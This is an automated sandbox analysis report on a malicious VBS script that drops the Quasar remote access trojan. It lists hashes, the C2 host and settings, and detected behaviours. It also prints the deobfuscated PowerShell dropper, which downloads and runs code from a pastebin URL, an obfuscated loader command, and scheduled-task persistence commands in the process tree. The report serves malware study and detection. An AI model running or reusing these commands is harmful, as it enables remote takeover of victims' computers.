Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

77cc8d160d...d1.vbs

windows7-x64

10

77cc8d160d...d1.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230621-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230621-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01/07/2023, 01:07 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs

  • Size

    213KB

  • MD5

    2ee3aa9bc2da3fce27fe025356ae13b1

  • SHA1

    d6c9f20fbfef8b1dca77e002c4ad2b9f7cad13c5

  • SHA256

    77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1

  • SHA512

    44d12a96f0c6ab16de52ebaae017f4e5e755831bfc9fe4704c560cb92f31f520737cf60949e89ea9e79bd744fa2065a0b29d90d4a033404e3fbdcf1c974b1f28

  • SSDEEP

    3072:u5d6525555555e555555555555p5555+Ji555tp:R

Score
10/10
quasaracs hopepersistencespywaretrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
1
$rrjho = "01234"
2
$muwth = "C:\\Users\\Admin\\AppData\\Local\\Temp\\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs"
3
[byte[]]$buofc = [system.convert]::frombase64string((new-object net.webclient).downloadstring((new-object net.webclient).downloadstring("https://pastebin.com/raw/16APD4C6")))
4
(((([system.appdomain]::currentdomain).load($buofc)).gettype("CdWDdB.DKeSvl")).getmethod("NnIaUq")).invoke($null, [object[]]"li7fniwy6bqx/daolnwod/moc.oietsap//:sptth", $muwth, "eyUWM", $rrjho, "1", "Roda")
5
URLs
ps1.dropper

https://pastebin.com/raw/16APD4C6

Extracted

Family

quasar

Version

1.3.0.0

Botnet

ACS hope

C2

crazydns.linkpc.net:26133

Mutex

QSR_MUTEX_6iGAmxpR39hpOQEFqk

Attributes
  • encryption_key

    qiJ37BhO6EEtAoSo8ukb

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Client Startup

  • subdirectory

    SubDir

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar payload 1 IoCs
  • Blocklisted process makes network request 12 IoCs
  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Adds Run key to start application 2 TTPs 3 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Suspicious behavior: EnumeratesProcesses 62 IoCs
  • Suspicious use of AdjustPrivilegeToken 27 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3080
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J‱By‱HI‱agBo‱G8‱I‱‱9‱C‱‱Jw‱w‱DE‱Mg‱z‱DQ‱Jw‱7‱CQ‱bQB1‱Hc‱d‱Bo‱C‱‱PQ‱g‱Cc‱JQBw‱Ho‱QQBj‱E8‱ZwBJ‱G4‱TQBy‱CU‱Jw‱7‱Fs‱QgB5‱HQ‱ZQBb‱F0‱XQ‱g‱CQ‱YgB1‱G8‱ZgBj‱C‱‱PQ‱g‱Fs‱cwB5‱HM‱d‱Bl‱G0‱LgBD‱G8‱bgB2‱GU‱cgB0‱F0‱Og‱6‱EY‱cgBv‱G0‱QgBh‱HM‱ZQ‱2‱DQ‱UwB0‱HI‱aQBu‱Gc‱K‱‱g‱Cg‱TgBl‱Hc‱LQBP‱GI‱agBl‱GM‱d‱‱g‱E4‱ZQB0‱C4‱VwBl‱GI‱QwBs‱Gk‱ZQBu‱HQ‱KQ‱u‱EQ‱bwB3‱G4‱b‱Bv‱GE‱Z‱BT‱HQ‱cgBp‱G4‱Zw‱o‱C‱‱K‱BO‱GU‱dw‱t‱E8‱YgBq‱GU‱YwB0‱C‱‱TgBl‱HQ‱LgBX‱GU‱YgBD‱Gw‱aQBl‱G4‱d‱‱p‱C4‱R‱Bv‱Hc‱bgBs‱G8‱YQBk‱FM‱d‱By‱Gk‱bgBn‱Cg‱JwBo‱HQ‱d‱Bw‱HM‱Og‱v‱C8‱c‱Bh‱HM‱d‱Bl‱GI‱aQBu‱C4‱YwBv‱G0‱LwBy‱GE‱dw‱v‱DE‱NgBB‱F‱‱R‱‱0‱EM‱Ng‱n‱Ck‱I‱‱p‱C‱‱KQ‱7‱Fs‱cwB5‱HM‱d‱Bl‱G0‱LgBB‱H‱‱c‱BE‱G8‱bQBh‱Gk‱bgBd‱Do‱OgBD‱HU‱cgBy‱GU‱bgB0‱EQ‱bwBt‱GE‱aQBu‱C4‱T‱Bv‱GE‱Z‱‱o‱CQ‱YgB1‱G8‱ZgBj‱Ck‱LgBH‱GU‱d‱BU‱Hk‱c‱Bl‱Cg‱JwBD‱GQ‱VwBE‱GQ‱Qg‱u‱EQ‱SwBl‱FM‱dgBs‱Cc‱KQ‱u‱Ec‱ZQB0‱E0‱ZQB0‱Gg‱bwBk‱Cg‱JwBO‱G4‱SQBh‱FU‱cQ‱n‱Ck‱LgBJ‱G4‱dgBv‱Gs‱ZQ‱o‱CQ‱bgB1‱Gw‱b‱‱s‱C‱‱WwBv‱GI‱agBl‱GM‱d‱Bb‱F0‱XQ‱g‱Cg‱JwBs‱Gk‱NwBm‱G4‱aQB3‱Hk‱NgBi‱HE‱e‱‱v‱GQ‱YQBv‱Gw‱bgB3‱G8‱Z‱‱v‱G0‱bwBj‱C4‱bwBp‱GU‱d‱Bz‱GE‱c‱‱v‱C8‱OgBz‱H‱‱d‱B0‱Gg‱Jw‱g‱Cw‱I‱‱k‱G0‱dQB3‱HQ‱a‱‱g‱Cw‱I‱‱n‱GU‱eQBV‱Fc‱TQ‱n‱Cw‱I‱‱k‱HI‱cgBq‱Gg‱bw‱s‱C‱‱Jw‱x‱Cc‱L‱‱g‱Cc‱UgBv‱GQ‱YQ‱n‱C‱‱KQ‱p‱Ds‱';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('‱','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs');powershell -command $KByHL;
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4952
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$rrjho = '01234';$muwth = 'C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs';[Byte[]] $buofc = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/16APD4C6') ) );[system.AppDomain]::CurrentDomain.Load($buofc).GetType('CdWDdB.DKeSvl').GetMethod('NnIaUq').Invoke($null, [object[]] ('li7fniwy6bqx/daolnwod/moc.oietsap//:sptth' , $muwth , 'eyUWM', $rrjho, '1', 'Roda' ));"
        3⤵
        • Blocklisted process makes network request
        • Drops startup file
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4384
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3908
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
            5⤵
            • Adds Run key to start application
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3976
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3472
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1688
        • C:\Windows\SYSTEM32\cmd.exe
          cmd.exe /c schtasks.exe /create /tn "Roda" /tr "wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\xx.vbs'" /sc minute /mo 1 /f & exit
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2540
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "Roda" /tr "wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\xx.vbs'" /sc minute /mo 1 /f
            5⤵
            • Creates scheduled task(s)
            PID:2524
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4960
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
          4⤵
            PID:4832
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:3860
    • C:\Windows\system32\wscript.exe
      wscript.exe //b //nologo "C:\Users\Admin\AppData\Local\Temp\xx.vbs"
      1⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:1720
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs'
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:400
        • C:\Windows\system32\wscript.exe
          "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs
          3⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:984
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J‱By‱HI‱agBo‱G8‱I‱‱9‱C‱‱Jw‱w‱DE‱Mg‱z‱DQ‱Jw‱7‱CQ‱bQB1‱Hc‱d‱Bo‱C‱‱PQ‱g‱Cc‱JQBw‱Ho‱QQBj‱E8‱ZwBJ‱G4‱TQBy‱CU‱Jw‱7‱Fs‱QgB5‱HQ‱ZQBb‱F0‱XQ‱g‱CQ‱YgB1‱G8‱ZgBj‱C‱‱PQ‱g‱Fs‱cwB5‱HM‱d‱Bl‱G0‱LgBD‱G8‱bgB2‱GU‱cgB0‱F0‱Og‱6‱EY‱cgBv‱G0‱QgBh‱HM‱ZQ‱2‱DQ‱UwB0‱HI‱aQBu‱Gc‱K‱‱g‱Cg‱TgBl‱Hc‱LQBP‱GI‱agBl‱GM‱d‱‱g‱E4‱ZQB0‱C4‱VwBl‱GI‱QwBs‱Gk‱ZQBu‱HQ‱KQ‱u‱EQ‱bwB3‱G4‱b‱Bv‱GE‱Z‱BT‱HQ‱cgBp‱G4‱Zw‱o‱C‱‱K‱BO‱GU‱dw‱t‱E8‱YgBq‱GU‱YwB0‱C‱‱TgBl‱HQ‱LgBX‱GU‱YgBD‱Gw‱aQBl‱G4‱d‱‱p‱C4‱R‱Bv‱Hc‱bgBs‱G8‱YQBk‱FM‱d‱By‱Gk‱bgBn‱Cg‱JwBo‱HQ‱d‱Bw‱HM‱Og‱v‱C8‱c‱Bh‱HM‱d‱Bl‱GI‱aQBu‱C4‱YwBv‱G0‱LwBy‱GE‱dw‱v‱DE‱NgBB‱F‱‱R‱‱0‱EM‱Ng‱n‱Ck‱I‱‱p‱C‱‱KQ‱7‱Fs‱cwB5‱HM‱d‱Bl‱G0‱LgBB‱H‱‱c‱BE‱G8‱bQBh‱Gk‱bgBd‱Do‱OgBD‱HU‱cgBy‱GU‱bgB0‱EQ‱bwBt‱GE‱aQBu‱C4‱T‱Bv‱GE‱Z‱‱o‱CQ‱YgB1‱G8‱ZgBj‱Ck‱LgBH‱GU‱d‱BU‱Hk‱c‱Bl‱Cg‱JwBD‱GQ‱VwBE‱GQ‱Qg‱u‱EQ‱SwBl‱FM‱dgBs‱Cc‱KQ‱u‱Ec‱ZQB0‱E0‱ZQB0‱Gg‱bwBk‱Cg‱JwBO‱G4‱SQBh‱FU‱cQ‱n‱Ck‱LgBJ‱G4‱dgBv‱Gs‱ZQ‱o‱CQ‱bgB1‱Gw‱b‱‱s‱C‱‱WwBv‱GI‱agBl‱GM‱d‱Bb‱F0‱XQ‱g‱Cg‱JwBs‱Gk‱NwBm‱G4‱aQB3‱Hk‱NgBi‱HE‱e‱‱v‱GQ‱YQBv‱Gw‱bgB3‱G8‱Z‱‱v‱G0‱bwBj‱C4‱bwBp‱GU‱d‱Bz‱GE‱c‱‱v‱C8‱OgBz‱H‱‱d‱B0‱Gg‱Jw‱g‱Cw‱I‱‱k‱G0‱dQB3‱HQ‱a‱‱g‱Cw‱I‱‱n‱GU‱eQBV‱Fc‱TQ‱n‱Cw‱I‱‱k‱HI‱cgBq‱Gg‱bw‱s‱C‱‱Jw‱x‱Cc‱L‱‱g‱Cc‱UgBv‱GQ‱YQ‱n‱C‱‱KQ‱p‱Ds‱';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('‱','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs');powershell -command $KByHL;
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4596
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$rrjho = '01234';$muwth = 'C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs';[Byte[]] $buofc = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/16APD4C6') ) );[system.AppDomain]::CurrentDomain.Load($buofc).GetType('CdWDdB.DKeSvl').GetMethod('NnIaUq').Invoke($null, [object[]] ('li7fniwy6bqx/daolnwod/moc.oietsap//:sptth' , $muwth , 'eyUWM', $rrjho, '1', 'Roda' ));"
              5⤵
              • Blocklisted process makes network request
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4608
    • C:\Windows\system32\wscript.exe
      wscript.exe //b //nologo "C:\Users\Admin\AppData\Local\Temp\xx.vbs"
      1⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:1548
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs'
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1844
        • C:\Windows\system32\wscript.exe
          "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs
          3⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:2760
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J‱By‱HI‱agBo‱G8‱I‱‱9‱C‱‱Jw‱w‱DE‱Mg‱z‱DQ‱Jw‱7‱CQ‱bQB1‱Hc‱d‱Bo‱C‱‱PQ‱g‱Cc‱JQBw‱Ho‱QQBj‱E8‱ZwBJ‱G4‱TQBy‱CU‱Jw‱7‱Fs‱QgB5‱HQ‱ZQBb‱F0‱XQ‱g‱CQ‱YgB1‱G8‱ZgBj‱C‱‱PQ‱g‱Fs‱cwB5‱HM‱d‱Bl‱G0‱LgBD‱G8‱bgB2‱GU‱cgB0‱F0‱Og‱6‱EY‱cgBv‱G0‱QgBh‱HM‱ZQ‱2‱DQ‱UwB0‱HI‱aQBu‱Gc‱K‱‱g‱Cg‱TgBl‱Hc‱LQBP‱GI‱agBl‱GM‱d‱‱g‱E4‱ZQB0‱C4‱VwBl‱GI‱QwBs‱Gk‱ZQBu‱HQ‱KQ‱u‱EQ‱bwB3‱G4‱b‱Bv‱GE‱Z‱BT‱HQ‱cgBp‱G4‱Zw‱o‱C‱‱K‱BO‱GU‱dw‱t‱E8‱YgBq‱GU‱YwB0‱C‱‱TgBl‱HQ‱LgBX‱GU‱YgBD‱Gw‱aQBl‱G4‱d‱‱p‱C4‱R‱Bv‱Hc‱bgBs‱G8‱YQBk‱FM‱d‱By‱Gk‱bgBn‱Cg‱JwBo‱HQ‱d‱Bw‱HM‱Og‱v‱C8‱c‱Bh‱HM‱d‱Bl‱GI‱aQBu‱C4‱YwBv‱G0‱LwBy‱GE‱dw‱v‱DE‱NgBB‱F‱‱R‱‱0‱EM‱Ng‱n‱Ck‱I‱‱p‱C‱‱KQ‱7‱Fs‱cwB5‱HM‱d‱Bl‱G0‱LgBB‱H‱‱c‱BE‱G8‱bQBh‱Gk‱bgBd‱Do‱OgBD‱HU‱cgBy‱GU‱bgB0‱EQ‱bwBt‱GE‱aQBu‱C4‱T‱Bv‱GE‱Z‱‱o‱CQ‱YgB1‱G8‱ZgBj‱Ck‱LgBH‱GU‱d‱BU‱Hk‱c‱Bl‱Cg‱JwBD‱GQ‱VwBE‱GQ‱Qg‱u‱EQ‱SwBl‱FM‱dgBs‱Cc‱KQ‱u‱Ec‱ZQB0‱E0‱ZQB0‱Gg‱bwBk‱Cg‱JwBO‱G4‱SQBh‱FU‱cQ‱n‱Ck‱LgBJ‱G4‱dgBv‱Gs‱ZQ‱o‱CQ‱bgB1‱Gw‱b‱‱s‱C‱‱WwBv‱GI‱agBl‱GM‱d‱Bb‱F0‱XQ‱g‱Cg‱JwBs‱Gk‱NwBm‱G4‱aQB3‱Hk‱NgBi‱HE‱e‱‱v‱GQ‱YQBv‱Gw‱bgB3‱G8‱Z‱‱v‱G0‱bwBj‱C4‱bwBp‱GU‱d‱Bz‱GE‱c‱‱v‱C8‱OgBz‱H‱‱d‱B0‱Gg‱Jw‱g‱Cw‱I‱‱k‱G0‱dQB3‱HQ‱a‱‱g‱Cw‱I‱‱n‱GU‱eQBV‱Fc‱TQ‱n‱Cw‱I‱‱k‱HI‱cgBq‱Gg‱bw‱s‱C‱‱Jw‱x‱Cc‱L‱‱g‱Cc‱UgBv‱GQ‱YQ‱n‱C‱‱KQ‱p‱Ds‱';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('‱','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs');powershell -command $KByHL;
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:632
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$rrjho = '01234';$muwth = 'C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs';[Byte[]] $buofc = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/16APD4C6') ) );[system.AppDomain]::CurrentDomain.Load($buofc).GetType('CdWDdB.DKeSvl').GetMethod('NnIaUq').Invoke($null, [object[]] ('li7fniwy6bqx/daolnwod/moc.oietsap//:sptth' , $muwth , 'eyUWM', $rrjho, '1', 'Roda' ));"
              5⤵
              • Blocklisted process makes network request
              • Drops startup file
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:5036
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
                6⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:4756
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
                  7⤵
                  • Adds Run key to start application
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4352
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
                6⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1228
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
                6⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2060
              • C:\Windows\system32\cmd.exe
                cmd.exe /c schtasks.exe /create /tn "Roda" /tr "wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\xx.vbs'" /sc minute /mo 1 /f & exit
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:4272
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "Roda" /tr "wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\xx.vbs'" /sc minute /mo 1 /f
                  7⤵
                  • Creates scheduled task(s)
                  PID:652
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
                6⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4968
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                6⤵
                  PID:2004
      • C:\Windows\system32\wscript.exe
        wscript.exe //b //nologo "C:\Users\Admin\AppData\Local\Temp\xx.vbs"
        1⤵
        • Checks computer location settings
        PID:4296
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs'
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2264
          • C:\Windows\system32\wscript.exe
            "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs
            3⤵
            • Checks computer location settings
            PID:3900
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J‱By‱HI‱agBo‱G8‱I‱‱9‱C‱‱Jw‱w‱DE‱Mg‱z‱DQ‱Jw‱7‱CQ‱bQB1‱Hc‱d‱Bo‱C‱‱PQ‱g‱Cc‱JQBw‱Ho‱QQBj‱E8‱ZwBJ‱G4‱TQBy‱CU‱Jw‱7‱Fs‱QgB5‱HQ‱ZQBb‱F0‱XQ‱g‱CQ‱YgB1‱G8‱ZgBj‱C‱‱PQ‱g‱Fs‱cwB5‱HM‱d‱Bl‱G0‱LgBD‱G8‱bgB2‱GU‱cgB0‱F0‱Og‱6‱EY‱cgBv‱G0‱QgBh‱HM‱ZQ‱2‱DQ‱UwB0‱HI‱aQBu‱Gc‱K‱‱g‱Cg‱TgBl‱Hc‱LQBP‱GI‱agBl‱GM‱d‱‱g‱E4‱ZQB0‱C4‱VwBl‱GI‱QwBs‱Gk‱ZQBu‱HQ‱KQ‱u‱EQ‱bwB3‱G4‱b‱Bv‱GE‱Z‱BT‱HQ‱cgBp‱G4‱Zw‱o‱C‱‱K‱BO‱GU‱dw‱t‱E8‱YgBq‱GU‱YwB0‱C‱‱TgBl‱HQ‱LgBX‱GU‱YgBD‱Gw‱aQBl‱G4‱d‱‱p‱C4‱R‱Bv‱Hc‱bgBs‱G8‱YQBk‱FM‱d‱By‱Gk‱bgBn‱Cg‱JwBo‱HQ‱d‱Bw‱HM‱Og‱v‱C8‱c‱Bh‱HM‱d‱Bl‱GI‱aQBu‱C4‱YwBv‱G0‱LwBy‱GE‱dw‱v‱DE‱NgBB‱F‱‱R‱‱0‱EM‱Ng‱n‱Ck‱I‱‱p‱C‱‱KQ‱7‱Fs‱cwB5‱HM‱d‱Bl‱G0‱LgBB‱H‱‱c‱BE‱G8‱bQBh‱Gk‱bgBd‱Do‱OgBD‱HU‱cgBy‱GU‱bgB0‱EQ‱bwBt‱GE‱aQBu‱C4‱T‱Bv‱GE‱Z‱‱o‱CQ‱YgB1‱G8‱ZgBj‱Ck‱LgBH‱GU‱d‱BU‱Hk‱c‱Bl‱Cg‱JwBD‱GQ‱VwBE‱GQ‱Qg‱u‱EQ‱SwBl‱FM‱dgBs‱Cc‱KQ‱u‱Ec‱ZQB0‱E0‱ZQB0‱Gg‱bwBk‱Cg‱JwBO‱G4‱SQBh‱FU‱cQ‱n‱Ck‱LgBJ‱G4‱dgBv‱Gs‱ZQ‱o‱CQ‱bgB1‱Gw‱b‱‱s‱C‱‱WwBv‱GI‱agBl‱GM‱d‱Bb‱F0‱XQ‱g‱Cg‱JwBs‱Gk‱NwBm‱G4‱aQB3‱Hk‱NgBi‱HE‱e‱‱v‱GQ‱YQBv‱Gw‱bgB3‱G8‱Z‱‱v‱G0‱bwBj‱C4‱bwBp‱GU‱d‱Bz‱GE‱c‱‱v‱C8‱OgBz‱H‱‱d‱B0‱G